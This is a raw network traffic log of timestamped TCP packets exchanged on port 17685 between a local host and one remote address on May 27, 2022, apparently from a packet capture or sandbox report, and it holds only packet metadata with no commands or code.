May 27, 2022 19:28:20.058754921 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.058792114 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.058835983 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.058852911 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.058867931 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.058957100 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.058996916 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.059011936 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.059041023 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.059057951 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.059073925 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.059089899 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.059107065 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.059120893 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.059154987 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.059170961 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.059186935 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.059248924 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.059273005 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.059315920 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.059333086 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.059348106 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.059392929 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.059437990 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.059478998 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.059506893 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.059523106 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.059554100 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.059571981 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.059634924 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.059673071 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.059711933 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.059798002 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.059813023 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.059828997 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.059845924 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.059961081 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.059977055 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.059993029 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.060008049 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.060024023 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.060039997 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.060055017 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.060070038 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.060085058 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.060101032 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.060149908 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.060194969 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.060235977 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.060317039 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.060333967 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.060349941 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.060370922 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.060401917 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.060440063 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.060486078 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.060513973 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.060553074 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.074018955 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.074047089 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.074094057 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.074110985 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.074155092 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.074199915 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.074238062 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.074356079 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.074435949 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.074556112 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.163523912 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.182429075 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.569844961 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.588747025 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.588838100 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.607644081 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.607664108 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.607729912 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.608692884 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.626523972 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.626619101 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.627392054 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.627408028 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.627455950 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.627475023 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.629589081 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.645483017 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.645508051 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.645628929 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.646235943 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.646250963 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.646282911 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.646297932 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.646333933 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.647562027 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.648327112 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.648559093 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.664405107 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.664525986 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.664944887 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.664961100 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.664973974 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.664985895 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.665016890 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.665045023 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.666254044 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.666305065 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.667258024 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.683321953 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.683353901 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.683651924 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.683674097 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.684989929 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.685133934 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.703938961 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.703977108 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.703989029 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.704000950 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.704011917 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.704025984 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.704044104 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.704124928 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.722824097 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.722843885 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.722856998 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.722872019 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.722883940 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.722896099 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.722908020 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.722919941 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.722932100 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.722943068 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.722981930 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.723001957 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.723016024 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.723069906 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.741725922 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.741760969 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.741775036 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.741786957 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.741797924 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.741801977 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.741811037 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.741826057 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.741837025 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.741848946 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.741861105 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.741861105 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.741889954 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.741925001 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.760617971 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.760637999 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.760649920 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.760663033 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.760675907 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.760688066 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.760700941 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.760713100 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.760725021 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.760736942 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.760740995 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.760747910 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.760761023 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.760816097 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.760838985 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.779546022 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.779562950 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.779575109 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.779582977 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.779594898 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.779608011 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.779622078 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.779635906 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.779644012 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.779656887 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.779680967 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.779726028 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.779778004 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.798563957 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.798590899 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.798602104 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.798614979 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.798628092 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.798639059 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.798656940 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.798671961 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.798687935 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.798700094 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.798711061 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.798723936 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.798736095 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.798778057 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.798816919 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.798830032 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.817547083 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.817569017 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.817580938 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.817594051 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.817647934 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.817657948 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.817661047 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.817684889 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.817687035 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.817699909 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.817722082 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.817744970 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.817758083 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.817769051 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.817820072 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.817828894 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.836426020 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.836445093 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.836457014 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.836468935 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.836493969 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.836505890 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.836519003 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.836532116 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.836551905 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.836568117 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.836608887 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.836627960 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.836633921 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.836641073 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.836653948 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.836666107 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.836697102 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.836719990 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.855458975 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.855523109 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.855580091 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.855614901 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.855628014 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.855631113 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.855663061 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.855680943 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.855808020 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.855851889 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.855854034 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.855892897 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.855897903 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.855935097 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.855938911 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.855952978 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.855964899 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.855978012 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.855998039 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.856021881 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.856044054 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.856065989 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.856070995 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.856082916 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.856095076 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.856139898 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.856308937 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.874191999 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.874254942 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.874293089 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.874303102 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.874330044 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.874371052 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.874388933 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.874500990 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.874511957 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.874586105 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.874596119 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.874649048 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.874696970 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.874751091 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.874820948 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.874833107 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.874844074 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.874856949 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.874880075 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.874901056 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.874914885 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.874927998 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.874939919 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.874963045 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.874985933 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.874998093 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.875031948 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.893138885 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.893162012 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.893176079 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.893223047 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.893261909 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.893275023 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.893311977 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.893346071 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.893390894 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.893403053 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.893446922 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.893500090 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.893546104 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.893549919 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.893557072 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.893599033 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.893634081 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.893663883 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.893676043 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.893682003 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.893702984 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.893740892 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.893743038 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.893793106 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:20.893830061 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.912260056 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.912281036 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.912296057 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.912314892 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.912332058 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.912435055 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.912468910 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.912509918 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.912554026 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.912673950 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.912693977 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.912795067 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.912812948 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.912914038 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:20.912930965 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.024976969 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.025346994 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.044128895 CEST	17685	49741	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.044203997 CEST	49741	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.060803890 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.079682112 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.079791069 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.081269026 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.099920988 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.109380007 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.110606909 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.129522085 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.129729986 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.148652077 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.148690939 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.148709059 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.148720026 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.148734093 CEST	17685	49744	18.192.93.86	192.168.2.3
May 27, 2022 19:28:21.148749113 CEST	49744	17685	192.168.2.3	18.192.93.86
May 27, 2022 19:28:21.148755074 CEST	17685	49744	18.192.93.86	192.168.2.3
